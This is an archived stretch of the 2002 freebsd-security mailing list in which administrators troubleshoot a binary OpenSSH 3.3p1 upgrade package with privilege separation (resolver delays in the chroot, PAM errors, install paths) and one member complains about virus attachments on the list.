Jun 2002 04:37:29 -0700 (PDT) Received: from tele2unixgurun (wintendo.tele2.no [193.216.151.140]) by mail.dax.net (8.11.6/8.11.3) with SMTP id g5QBbSS64169 for ; Wed, 26 Jun 2002 13:37:28 +0200 (CEST) (envelope-from olofson@dax.net) Message-ID: <028001c21d05$d9c0d310$8c97d8c1@tele2unixgurun> Reply-To: "Haakan Olofsson" From: "Haakan Olofsson" To: Subject: Viruses attaahce to emails in this mailing list Date: Wed, 26 Jun 2002 13:37:23 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org damnit cant you block attachments in this mailinglist, im getting tired of getting virii's in the mail Regards Olofson Beware us from the LiNUX penguin!!!! , , /( )` Olofson \ \___ / | SystemEngineer/UnixGuru /- _ `-/ ' (/\/ \ \ /\ / / | ` \ O O ) / | `-^--'`< ' (_.) _ ) / `.___/` / `-----' / <----. __ / __ \ <----|====O)))==) \) /==== <----' `--' `.__,' \ olofson@dax.net | | \ / ______( (_ / \_____ ,' ,-----' | \ `--{__________) \/ `--{__________) \/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 4:43:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from favour.one2net.co.ug (g-class.sanyutel.com [216.250.215.27]) by hub.freebsd.org (Postfix) with ESMTP id C67B037B400 for ; Wed, 26 Jun 2002 04:43:29 -0700 (PDT) Received: from localhost (localhost.one2net.co.ug [127.0.0.1]) by favour.one2net.co.ug (Postfix) with ESMTP id 0913854833; Wed, 26 Jun 2002 14:42:23 +0300 (EAT) Date: Wed, 26 Jun 2002 14:42:23 +0300 (EAT) From: Noah K Sematimba X-X-Sender: ksemat@favour.one2net.co.ug To: Haakan Olofsson Cc: freebsd-security@freebsd.org Subject: Re: Viruses attaahce to emails in this mailing list In-Reply-To: <028001c21d05$d9c0d310$8c97d8c1@tele2unixgurun> Message-ID: <20020626144153.P45037-100000@favour.one2net.co.ug> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org They shouldn't bother you unless you're using M$ for reading your mail!! Noah. On Wed, 26 Jun 2002, Haakan Olofsson wrote: > damnit > > cant you block attachments in this mailinglist, im getting tired of getting > virii's in the mail > > > Regards > > Olofson > > Beware us from the LiNUX penguin!!!! > > , , > /( )` Olofson > \ \___ / | SystemEngineer/UnixGuru > /- _ `-/ ' > (/\/ \ \ /\ > / / | ` \ > O O ) / | > `-^--'`< ' > (_.) _ ) / > `.___/` / > `-----' / > <----. __ / __ \ > <----|====O)))==) \) /==== > <----' `--' `.__,' \ olofson@dax.net > | | > \ / > ______( (_ / \_____ > ,' ,-----' | \ > `--{__________) \/ > > `--{__________) \/ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 5: 7:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from norton.palomine.net (dsl254-102-179.nyc1.dsl.speakeasy.net [216.254.102.179]) by hub.freebsd.org (Postfix) with SMTP id 8F28837B401 for ; Wed, 26 Jun 2002 05:07:01 -0700 (PDT) Received: (qmail 75867 invoked by uid 1000); 26 Jun 2002 12:07:00 -0000 Date: Wed, 26 Jun 2002 08:07:00 -0400 From: Chris Johnson To: Lupe Christoph Cc: Brett Glass , security@FreeBSD.ORG Subject: Re: Binary upgrade available Message-ID: <20020626120700.GA75543@palomine.net> References: <4.3.2.7.2.20020625194026.03128420@localhost> <20020626105930.GA16936@lupe-christoph.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="J2SCkAp4GZ/dPZZf" Content-Disposition: inline In-Reply-To: <20020626105930.GA16936@lupe-christoph.de> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --J2SCkAp4GZ/dPZZf Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jun 26, 2002 at 12:59:30PM +0200, Lupe Christoph wrote: > On Tuesday, 2002-06-25 at 19:44:43 -0600, Brett Glass wrote: > > Thanks to Jeroen, a binary package that updates the OpenSSH in the base= =20 > > FreeBSD install to 3.3p1 is available at >=20 > Thanks for the package, *but* ;-) >=20 > It hangs trying to resolve the client address when I activate privsep. > I have a few Debian machines; this does not happen with the Debian > package. I can't strace it far enough to see what's happening. > Putting an /etc/hosts into the jail does not help. A resolv.conf does. >=20 > Strange, hum? I suppose the Linux code takes a slightly different path. > I don't run nscd on the Linux boxen. So they must access resolv.conf > earlier. >=20 > Maybe the package should copy /etc/resolv.conf to > /usr/empty/etc/resolv.conf. >=20 > Are other users of this package experiencing the same delay? Yes! But only on two of the ten or so machines I've installed it on. It's b= een driving me insane, because I can't figure out what's different about these = two particular machines than any of the others. Chris --J2SCkAp4GZ/dPZZf Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9Ga5iPC78Lz4X/PARAgrlAJ4hRw6PNs3y/afJ6A3ShVRr+WCSBACfWHCM z0n5nkTYztjbvMmZ8M/WLuc= =Jdu/ -----END PGP SIGNATURE----- --J2SCkAp4GZ/dPZZf-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 5: 9:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from ds.express.ru (ds.express.ru [212.24.32.7]) by hub.freebsd.org (Postfix) with ESMTP id 1067737B400 for ; Wed, 26 Jun 2002 05:09:52 -0700 (PDT) Received: from localhost.express.ru ([127.0.0.1] helo=localhost) by ds.express.ru with esmtp (Exim 2.12 #8) id 17NBcL-000Efh-00 for security@FreeBSD.ORG; Wed, 26 Jun 2002 16:09:49 +0400 Date: Wed, 26 Jun 2002 16:09:49 +0400 (MSD) From: Maxim Kozin To: security@FreeBSD.ORG Subject: Re: openssh-portable and s/key passwords In-Reply-To: <3D19A714.6000408@cerint.pl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I'm not sure if it's relevant to FreeBSD but debian advisory > http://www.debian.org/security/2002/dsa-134 > says: > > * keyboard interactive authentication does not work with privilege seperation. > Most noticable for Debian users this breaks PAM modules which need a PAM conversation > function (like the OPIE module). Problem: setup openssh + pam(some self-write module) When I don't create full chroot enviromnet in /usr/local/empty, sshd -d -d -d fail in start_pam. All symbol in my_pam.so must be resolved on privsep step, because copy in chroot all need libs,/etc/pam.conf and /etc/passwd Now I can see, that pam started, make succefuly auth. BUt session disconected with diagnostic: debug3: monitor_read: checking request 24 debug3: mm_send_keystate: Finished sending state monitor_read: unsupported request: 24 debug1: Calling cleanup 0x806d98c(0x0) "Request type 24" is some about tty/pty ? b.r. Kozin Maxim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 5:11:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 3B6AD37B406 for ; Wed, 26 Jun 2002 05:11:37 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com; Wed, 26 Jun 2002 05:11:30 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: security@FreeBSD.ORG Date: Wed, 26 Jun 2002 05:11:32 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Binary upgrade available Reply-To: pjklist@ekahuna.com Cc: Brett Glass In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020626121130543.AAA754@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Date: Tue, 25 Jun 2002 19:44:43 -0600 > From: Brett Glass > > Thanks to Jeroen, a binary package that updates the OpenSSH in the base > FreeBSD install to 3.3p1 is available at > > http://bob.cryptohill.net/~gelderen/openssh-overwrite-base-3.3p1_1.tgz > > This package will install right over the base install in FreeBSD 4.4, > 4.5, and 4.6, and will create the necessary pseudo-user, group, and > chroot directory for privilege separation. It won't touch your existing > sshd_config, so you'll need to add > > UsePrivilegeSeparation yes > Compression yes > > to that file and remove any obsolete directives that this new version > complains about. > > Hopefully, this will speed administrators' jobs as they try to plug the > OpenSSH hole before next week. > > - --Brett Glass Very handy, and much appreciated. Couple of observations: According to the steps outlined earlier to ascertain whether privsep is working, in my case it seems not to be. (I am of the impression that the path shown at the end should now show "/usr/empty"): #lsof -p |grep rtd sshd 109 root rtd VDIR 13,196608 1024 2 / Also after the install runs, it asks you make some configuration settings that apply to the port, but not this variation that overwrites the base version. (if you do make those changes, it will point to files in /usr/local that don't exist) Lastly when sshd starts up in my case, it complains non-fatally: "sshd/etc/ssh/sshd_config line 68: Deprecated option CheckMail" Phil (PS: I bcc'd Jeroen, or at least an address I found in that web directory that appears to be him :-) -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 5:21: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from south.nanolink.com (south.nanolink.com [217.75.134.10]) by hub.freebsd.org (Postfix) with SMTP id 2DEF637B400 for ; Wed, 26 Jun 2002 05:21:01 -0700 (PDT) Received: (qmail 76155 invoked by uid 85); 26 Jun 2002 12:32:25 -0000 Received: from unknown (HELO straylight.ringlet.net) (212.116.140.125) by south.nanolink.com with SMTP; 26 Jun 2002 12:32:24 -0000 Received: (qmail 80197 invoked by uid 1000); 26 Jun 2002 12:19:27 -0000 Date: Wed, 26 Jun 2002 15:19:26 +0300 From: Peter Pentchev To: Maxim Kozin Cc: security@FreeBSD.ORG Subject: Re: openssh-portable and s/key passwords Message-ID: <20020626121924.GH355@straylight.oblivion.bg> Mail-Followup-To: Maxim Kozin , security@FreeBSD.ORG References: <3D19A714.6000408@cerint.pl> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="LiQwW4YX+w4axhAx" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.5.1i X-Virus-Scanned: by Nik's Monitoring Daemon (AMaViS perl-11d ) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --LiQwW4YX+w4axhAx Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jun 26, 2002 at 04:09:49PM +0400, Maxim Kozin wrote: > > I'm not sure if it's relevant to FreeBSD but debian advisory > > http://www.debian.org/security/2002/dsa-134 > > says: > >=20 > > * keyboard interactive authentication does not work with privilege se= peration. > > Most noticable for Debian users this breaks PAM modules which need a PA= M conversation > > function (like the OPIE module). >=20 > Problem: setup openssh + pam(some self-write module) > When I don't create full chroot enviromnet in /usr/local/empty,=20 > sshd -d -d -d fail in start_pam. > All symbol in my_pam.so must be resolved on privsep step, because > copy in chroot all need libs,/etc/pam.conf and /etc/passwd > Now I can see, that pam started, make succefuly auth. > BUt session disconected with diagnostic: > debug3: monitor_read: checking request 24 > debug3: mm_send_keystate: Finished sending state > monitor_read: unsupported request: 24 > debug1: Calling cleanup 0x806d98c(0x0) >=20 > "Request type 24" is some about tty/pty ? Could you try creating the tty* and possibly the pty* device nodes in the chroot environment's /dev? G'luck, Peter --=20 Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 This sentence claims to be an Epimenides paradox, but it is lying. --LiQwW4YX+w4axhAx Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9GbFM7Ri2jRYZRVMRAqkVAJwJZtcKKLE2xjEexyaKRS/ea86VcwCgtwN7 DpQpoEC7d9u+pt88eUOyrgY= =7PPG -----END PGP SIGNATURE----- --LiQwW4YX+w4axhAx-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 5:32:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from ds.express.ru (ds.express.ru [212.24.32.7]) by hub.freebsd.org (Postfix) with ESMTP id 5278237B400 for ; Wed, 26 Jun 2002 05:32:20 -0700 (PDT) Received: from localhost.express.ru ([127.0.0.1] helo=localhost) by ds.express.ru with esmtp (Exim 2.12 #8) id 17NBxw-000GKB-00; Wed, 26 Jun 2002 16:32:08 +0400 Date: Wed, 26 Jun 2002 16:32:07 +0400 (MSD) From: Maxim Kozin To: Peter Pentchev Cc: security@FreeBSD.ORG Subject: Re: openssh-portable and s/key passwords In-Reply-To: <20020626121924.GH355@straylight.oblivion.bg> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Could you try creating the tty* and possibly the pty* device nodes in > the chroot environment's /dev? Yes, but nothing changes, "unknown type: 24". p.s. imho, name "empty" in case of use PAM is incorrect. May be change to "ssh_chroot" ? b.r. Kozin Maxim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 5:58:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from amun.isnic.is (amun.isnic.is [193.4.58.10]) by hub.freebsd.org (Postfix) with ESMTP id 2B69837B405 for ; Wed, 26 Jun 2002 05:58:10 -0700 (PDT) Received: from amun.isnic.is (oli@localhost [127.0.0.1]) by amun.isnic.is (8.12.3/8.12.3/isnic) with ESMTP id g5QCvt2J075829; Wed, 26 Jun 2002 12:57:55 GMT (envelope-from oli@amun.isnic.is) Received: (from oli@localhost) by amun.isnic.is (8.12.3/8.12.3/Submit) id g5QCvsVC075828; Wed, 26 Jun 2002 12:57:54 GMT (envelope-from oli) Date: Wed, 26 Jun 2002 12:57:54 +0000 From: Olafur Osvaldsson To: Haakan Olofsson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Viruses attaahce to emails in this mailing list Message-ID: <20020626125754.GD70856@isnic.is> Mail-Followup-To: Haakan Olofsson , freebsd-security@FreeBSD.ORG References: <028001c21d05$d9c0d310$8c97d8c1@tele2unixgurun> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <028001c21d05$d9c0d310$8c97d8c1@tele2unixgurun> User-Agent: Mutt/1.3.28i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Haakan, Just use a filter on your end, /usr/ports/mail/noattach is used by me and many others successfully. /Oli On Wed, 26 Jun 2002, Haakan Olofsson wrote: > damnit > > cant you block attachments in this mailinglist, im getting tired of getting > virii's in the mail > > > Regards > > Olofson > -- Olafur Osvaldsson Systems Administrator Internet a Islandi hf. Tel: +354 525-5291 Email: oli@isnic.is To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 5:59:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from norton.palomine.net (dsl254-102-179.nyc1.dsl.speakeasy.net [216.254.102.179]) by hub.freebsd.org (Postfix) with SMTP id 5C95237B401 for ; Wed, 26 Jun 2002 05:59:13 -0700 (PDT) Received: (qmail 84471 invoked by uid 1000); 26 Jun 2002 12:59:12 -0000 Date: Wed, 26 Jun 2002 08:59:12 -0400 From: Chris Johnson To: Lupe Christoph Cc: Brett Glass , security@FreeBSD.ORG Subject: Re: Binary upgrade available Message-ID: <20020626125912.GA84385@palomine.net> References: <4.3.2.7.2.20020625194026.03128420@localhost> <20020626105930.GA16936@lupe-christoph.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="X1bOJ3K7DJ5YkBrT" Content-Disposition: inline In-Reply-To: <20020626105930.GA16936@lupe-christoph.de> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --X1bOJ3K7DJ5YkBrT Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jun 26, 2002 at 12:59:30PM +0200, Lupe Christoph wrote: > On Tuesday, 2002-06-25 at 19:44:43 -0600, Brett Glass wrote: > > Thanks to Jeroen, a binary package that updates the OpenSSH in the base= =20 > > FreeBSD install to 3.3p1 is available at >=20 > Thanks for the package, *but* ;-) >=20 > It hangs trying to resolve the client address when I activate privsep. > I have a few Debian machines; this does not happen with the Debian > package. I can't strace it far enough to see what's happening. > Putting an /etc/hosts into the jail does not help. A resolv.conf does. >=20 > Strange, hum? I suppose the Linux code takes a slightly different path. > I don't run nscd on the Linux boxen. So they must access resolv.conf > earlier. >=20 > Maybe the package should copy /etc/resolv.conf to > /usr/empty/etc/resolv.conf. >=20 > Are other users of this package experiencing the same delay? I'm experiencing the delay on only a couple of boxes. On those boxes on whi= ch I am experiencing the delay, I copied /etc/resolv.conf to /usr/local/empty/etc/resolv.conf, and the problem was solved. Why some boxes require this procedure and some don't is a mystery to me. Chris --X1bOJ3K7DJ5YkBrT Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9GbqfPC78Lz4X/PARAmO/AJ4/JMjmHJN18+1EfzZGffpyWCr+mwCgjIb6 lWQFLEclpbNEQtC60sXAMS8= =slmi -----END PGP SIGNATURE----- --X1bOJ3K7DJ5YkBrT-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 6: 2:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from math.teaser.net (math.teaser.net [213.91.2.4]) by hub.freebsd.org (Postfix) with ESMTP id C394037B415 for ; Wed, 26 Jun 2002 06:02:15 -0700 (PDT) Received: from roadrunner.rominet.net (ATuileries-109-1-2-231.abo.wanadoo.fr [80.13.122.231]) by math.teaser.net (Postfix) with ESMTP id 74DC96C806 for ; Wed, 26 Jun 2002 15:02:14 +0200 (CEST) Received: by roadrunner.rominet.net (Postfix, from userid 1000) id DC0AD814A; Wed, 26 Jun 2002 15:02:12 +0200 (CEST) Date: Wed, 26 Jun 2002 15:02:12 +0200 From: Alain Thivillon To: freebsd-security@freebsd.org Subject: Re: Binary upgrade available Message-ID: <20020626130212.GK9492@roadrunner.rominet.net> References: <4.3.2.7.2.20020625194026.03128420@localhost> <20020626105930.GA16936@lupe-christoph.de> <20020626125912.GA84385@palomine.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020626125912.GA84385@palomine.net> User-Agent: Mutt/1.3.24i X-Organization: Rominet Networks Inc. X-Operating-System: FreeBSD 4.6-RC Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Why some boxes require this procedure and some don't is a mystery to me. If resolv.conf does not exists, resolver use localhost as name server. Maybe your boxes are running bind daemon on 127.0.0.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 6: 7:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from norton.palomine.net (dsl254-102-179.nyc1.dsl.speakeasy.net [216.254.102.179]) by hub.freebsd.org (Postfix) with SMTP id 0D6E637B419 for ; Wed, 26 Jun 2002 06:06:29 -0700 (PDT) Received: (qmail 84584 invoked by uid 1000); 26 Jun 2002 13:06:28 -0000 Date: Wed, 26 Jun 2002 09:06:28 -0400 From: Chris Johnson To: Alain Thivillon Cc: freebsd-security@freebsd.org Subject: Re: Binary upgrade available Message-ID: <20020626130628.GA84556@palomine.net> References: <4.3.2.7.2.20020625194026.03128420@localhost> <20020626105930.GA16936@lupe-christoph.de> <20020626125912.GA84385@palomine.net> <20020626130212.GK9492@roadrunner.rominet.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020626130212.GK9492@roadrunner.rominet.net> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 03:02:12PM +0200, Alain Thivillon wrote: > > > Why some boxes require this procedure and some don't is a mystery to me. > > If resolv.conf does not exists, resolver use localhost as name server. > Maybe your boxes are running bind daemon on 127.0.0.1 That's not it. In fact, on one (but not both) of the delay-experiencing boxes, resolv.conf does contain 127.0.0.1. Chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 6: 7:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.mail.vanderbilt.edu (smtp1.mail.Vanderbilt.Edu [129.59.1.75]) by hub.freebsd.org (Postfix) with ESMTP id 8907E37B40C for ; Wed, 26 Jun 2002 06:06:53 -0700 (PDT) Received: from smtp1.mail.vanderbilt.edu (LOCALHOST [127.0.0.1]) by smtp1.mail.vanderbilt.edu (8.11.6/8.11.6/VU-3.6C+d3.6) with ESMTP id g5QD6qL20187 for ; Wed, 26 Jun 2002 08:06:52 -0500 (CDT) Received: from george ([160.129.239.72]) by smtp1.mail.vanderbilt.edu (8.11.6/8.11.6/VU-3.6B+d3.6) with SMTP id g5QD6ph20175 for ; Wed, 26 Jun 2002 08:06:51 -0500 (CDT) From: "George Giles" To: Subject: Apache 1.3.26 package availability Date: Wed, 26 Jun 2002 08:07:18 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org HAs an apache 1.3.26 and mod_ssl package been produced that ameliorates this exploit ? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 6:27:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from aristotle.tamu.edu (Aristotle.tamu.edu [165.91.161.90]) by hub.freebsd.org (Postfix) with ESMTP id 9C89C37B405 for ; Wed, 26 Jun 2002 06:27:12 -0700 (PDT) Received: from aristotle.tamu.edu (localhost [127.0.0.1]) by aristotle.tamu.edu (8.12.3/8.12.3) with ESMTP id g5QDQb8t090120 for ; Wed, 26 Jun 2002 08:26:37 -0500 (CDT) (envelope-from rasmith@aristotle.tamu.edu) Message-Id: <200206261326.g5QDQb8t090120@aristotle.tamu.edu> To: freebsd-security@FreeBSD.ORG Subject: OpenSSH hole Mime-Version: 1.0 (generated by tm-edit 7.106) Content-Type: text/plain; charset=US-ASCII Date: Wed, 26 Jun 2002 08:26:37 -0500 From: Robin Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Having installed the openssh-portable port on a couple of FreeBSD boxes, I have a note and a question. Note: The port does just about the whole job (creates user/group sshd, dir /var/empty) and (with the option -D OPENSSH_OVERWRITE_BASE) puts all the stuff in the right places, except for the sample rc script, which it tries to drop into /usr/etc/rc.d. Since that's not part of the standard FreeBSD layout, the make then dies (so symlink /usr/etc->/usr/local/etc). Otherwise, all I had to do was edit and install the config files. Question: With privsep on, I see two 'sshd' processes created with each connection, one owned by root and one by the connecting user. However, if the connecting user happens to be root (i.e. if PermitRootLogin is on), then there's no split (and even if there were, both would be owned by root, of course). I haven't heard anything much about how the exploit works, but can someone who knows what the vulnerability actually is tell me if this means you're still vulnerable even with 3.3 and privsep if you allow root logins? Robin Smith Department of Philosophy rasmith@tamu.edu Texas A&M University Voice (979) 845-5696 College Station, TX 77843-4237 FAX (979) 845-0458 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 6:33:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from crimelords.org (crimelords.org [199.233.213.8]) by hub.freebsd.org (Postfix) with ESMTP id A43B837B405 for ; Wed, 26 Jun 2002 06:33:25 -0700 (PDT) Received: from localhost (admin@localhost) by crimelords.org (8.11.6/8.11.6) with ESMTP id g5QDVkC61113 for ; Wed, 26 Jun 2002 08:31:46 -0500 (CDT) (envelope-from admin@crimelords.org) Date: Wed, 26 Jun 2002 08:31:46 -0500 (CDT) From: admin To: freebsd-security@FreeBSD.ORG Subject: OpenSSH vulnerability Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm on this list, but haven't seen ANY email the past few days, so I'm going to post this to see if I even get it. I'm sure I was accidently removed or something, and will figure that out shortly. http://www.openssh.com A yet undisclosed vulnerability exists in OpenSSH. You are strongly encouraged to upgrade immediately to OpenSSH 3.3 with the UsePrivilegeSeparation option enabled. Privilege Separation blocks this problem. Keep an eye out for the upcoming OpenSSH 3.4 release on Monday that fixes the vulnerability itself. ports updated yet? -emacs To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 6:33:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id DEB2337B401 for ; Wed, 26 Jun 2002 06:33:33 -0700 (PDT) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.11.4/8.11.3) with ESMTP id g5QDXUH57453; Wed, 26 Jun 2002 09:33:30 -0400 (EDT) Date: Wed, 26 Jun 2002 09:33:30 -0400 (EDT) From: Ralph Huntington To: Brett Glass Cc: Subject: Re: Binary upgrade available In-Reply-To: <4.3.2.7.2.20020625194026.03128420@localhost> Message-ID: <20020626085911.X41820-100000@mohegan.mohawk.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > http://bob.cryptohill.net/~gelderen/openssh-overwrite-base-3.3p1_1.tgz After running pkg_add on openssh-overwrite-base-3.3p1_1.tgz (and everything going smoothly) I was presented these instructions: - To enable this port, please add sshd_program=/usr/local/sbin/sshd ... However, the binary was installed in /usr/sbin/sshd overwriting the old one, which was fine with me but could be extremely confusing for some. It was therefore not necessary to adjust anything in rc.conf (sshd_enable was already set to YES). If I had simply made the adjustment to rc.conf without checking the actual location of sshd, then the install would have been effectively broken. - make sure your path is setup to /usr/local/bin before /usr/bin so that - you are running the port version of openssh and not the version that - comes with FreeBSD huh? That didn't seem to matter: excalibur@gawain:~> echo $path /home/excalibur/bin /bin /sbin /usr/bin /usr/games /usr/local/bin \ /usr/sbin /usr/local/sbin excalibur@gawain:~> ps auxw | grep sshd root 12013 0.0 1.4 2080 1684 ?? Is 8:35AM 0:00.01 /usr/sbin/sshd root 12029 0.0 1.6 4868 1912 ?? I 8:57AM 0:00.07 sshd: excalibur [priv] (sshd) excalibur 12031 0.0 1.6 4868 